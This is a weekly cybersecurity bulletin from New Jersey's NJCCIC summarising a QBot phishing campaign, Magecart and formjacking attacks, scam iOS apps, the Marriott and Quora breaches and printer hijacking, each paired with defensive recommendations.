Providing our members with a weekly insight into the threats and malicious activity directly targeting New Jersey networks.
QBot Banking Trojan Phishing Campaign
The NJCCIC has detected an active phishing campaign attempting to deliver the QBot banking trojan to New Jersey government accounts. These emails appear as replies to previous email threads and contain URLs linking to Visual Basic Script (VBScript) files. If executed, these files will install QBot. Common subject lines associated with this campaign include references to a portal, application, or tax information. QBot monitors the browsing activity of infected computers, records information from financial websites, and supports polymorphic capabilities, allowing it to self-mutate as it moves inside a network. Qbot may download files and exfiltrate other sensitive information including passwords from an infected system. The NJCCIC recommends educating end users about this and similar phishing threats, reminding them never to click on links or open attachments delivered with unexpected or unsolicited emails. Users are advised to run an up-to-date anti-virus/anti-malware program on all devices and enable multi-factor authentication where available to prevent account compromise as a result of credential theft.
Announcement
DHS and FBI Publish Alert on SamSam Ransomware
The US Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) issued an alert, AA18-337A, to inform computer network defenders on the SamSam ransomware, also referred to as MSIL/Samas.A. The alert includes information on infection vectors, including vulnerabilities exploited, as well as recommendations for mitigation and prevention. Technical details on four SamSam ransomware variants to further assist network defenders are also included.
Threat Alerts
iOS TouchID used to Automatically Charge Users through
Scam Fitness Apps
ESET security researcher Lukas Stefanko reported that two iOS fitness apps, “Fitness Balance” and “Calorie Tracker,” were abusing Apple’s touch-to-pay feature in an attempt to charge users without their consent. These apps displayed pop-ups prompting users to scan their fingerprint in order to unlock calorie trackers and diet recommendations; however, doing so would result in an automatic charge attempt against the user’s credit card, ranging from $99-139. Users who had “Double Click to Pay” enabled were protected against the charge. The apps also had phony positive reviews in the app store, making them appear more legitimate. Apple is aware of these scams and has removed the apps from the App Store. To protect yourself against automatic app charges, the NJCCIC recommends iPhone X users enable the “Double Click to Pay Feature” and all other iPhone users disable TouchID for payments by going to Settings, then Touch ID & Passcode, and disabling "User Touch ID for iTunes & App Store." You can further protect yourself by evaluating negative app reviews to determine an app’s legitimacy, and by visiting our iOS malware threat profile for additional security recommendations. Victims of the scam can submit a report to Apple here.
Vision Direct Breach Expanded, Magecart Crawls for Admin Credentials
Image Source: RiskIQ
According to RiskIQ, Group 11 of the Magecart threat group was responsible for a much larger data breach of Vision Direct than initially projected in November. The breach was thought to be confined to their UK website, but has extended to include their websites for Italy, Spain, Ireland, France, Belgium, and Netherlands as well, all of which resolved to the same IP address. Furthermore, Group 11 is using a new tactic that seeks to gather the credentials of website administrators. The group is utilizing a new keyword filtering method that searches for the words “admin,” “account,” “login,” and “password.” This feature attempts to reach out beyond payment forms to login and administrative pages for information gathering. This new tactic indicates that Magecart poses an increased threat to e-commerce sites. The NJCCIC recommends that site owners avoid using third-party JavaScript when possible and refer to the Security Boulevard article for mitigation techniques to prevent Magecart attacks.
New Formjacking Campaign Targeting Top Retail Sites
Image Source: Symantec
Security researchers at Symantec have recently identified a new formjacking campaign targeting high profile e-commerce sites. Within three months, more than one million formjacking attempts against 10,000 websites were blocked by Symantec, and at least 30 major websites and their regional sites were compromised. Formjacking is the theft of payment information on a checkout webpage via malicious JavaScript code. Typically, formjacking compromises the supply chain, where malicious code is injected into third-party providers’ libraries. In this case, however, a pattern was observed where legitimate sites in the US, Australia, Japan, and Germany would redirect to a Paris-hosted site that contained the malicious formjacking code. The site’s code would also check for the presence of debugging tools in order to avoid security analysis. Websites affected by formjacking continue to operate as usual, making these attacks difficult to identify. Hacker groups like Magecart will continue to carry out these attacks, and it is very likely these types of attacks will continue to increase. The NJCCIC highly recommends site owners test all new updates in sandbox environments and monitor the behavior of their systems for abnormal activity patterns. When integrating third-party scripts, utilize Subresource Integrity (SRI) tags to verify the legitimacy of these scripts. For more information on the campaign, review the Symantec blog post.
Breach Notifications
Marriott
Marriott announced a data security incident that impacted up to 500 million guests who made a reservation at a Starwood property during the last four years. According to the company’s notification, the Starwood guest reservation database has been accessed by unauthorized actors since 2014. Compromised information includes customer names, and potentially their corresponding physical and email addresses. Passport number, Starwood Preferred Guest (SPG) account information, date of birth, gender, reservation details, and communication preferences may have also been exposed for approximately 327 million of the total guests affected. Marriott was alerted to the issue on September 8th of this year and began notifying affected customers via email on November 30th. The NJCCIC recommends those who stayed at a Starwood property during the last four years closely monitor their accounts and report fraudulent activity as soon as possible. We also recommend enrolling inany free credit monitoring programs offered by Marriott.
Quora
Quora, a community question and answer website, suffered a data breach that exposed information on 100 million users. Threat actors accessed account information such as name, email address, and encrypted passwords; public content such as questions, answers, and comments; and non-public content such as direct messages. Quora has engaged digital forensic and security experts to investigate and will notifying all impacted users. The full security update can be found here.
Threat Profiles
Android: No new or updated variants were added. Botnet: No new or updated botnets were added. Cryptocurrency-Mining: One new variant: Kingminer. Exploit Kit: No new or updated exploit kits were added. Industrial Control Systems: No new or updated variants were added. iOS: No new or updated variants were added. macOS: No new or updated variants were added. Point-of-Sale: No new or updated variants were added. Ransomware: No new or updated variants were added. Trojan: No new or updatedvariants were added.
Phishing Attempts Soar to 137 Million in Q3 Comment: A cybersecurity firm reported a 30 million increase in sextortion, spam, phishing, and crypto scam attempts over the previous quarter. The report indicated a notable increase in sextortion spam, consistent with the increase in incident reports to the NJCCIC from New Jersey citizens who have received these and similar emails. Maintaining awareness of tactics used by threat actors, as well as a healthy dose of skepticism, can greatly reduce victimization as a result of phishing and other spam emails.
Cyber at a Glance
Hacker Hijacks Printers Worldwide to Promote Popular YouTube Channel Comment: An anonymous Twitter user carried out a seemingly harmless prank in which he forced nearly 50,000 printers around the world to print out a flier in support of a YouTuber. However silly, the exploit had the potential for more serious damage. The Github toolkit used, called the Printer Exploitation Toolkit (PRET), had the potential to access internal networks and files, and cause physical damage to printers. While this hack was not born out of malice, it reveals that many organizations still fail to secure their network printers, leaving them exposed to the internet and accessible to unauthorized parties. You can secure your printer by changing its default usernames and passwords, keeping firmware updated, requiring a login, and turning off any unnecessary ports that allow remote access.
The Weekly Bulletin aggregates information about cyber threats, vulnerabilities, and other resources to promote shared awareness and the adoption of best practices. Designed for a general audience, the Bulletin aims to bridge the information sharing gaps between all levels of government, the private sector, and our citizens.
Connect
Share
We respect your right to privacy - click here to view our policy.
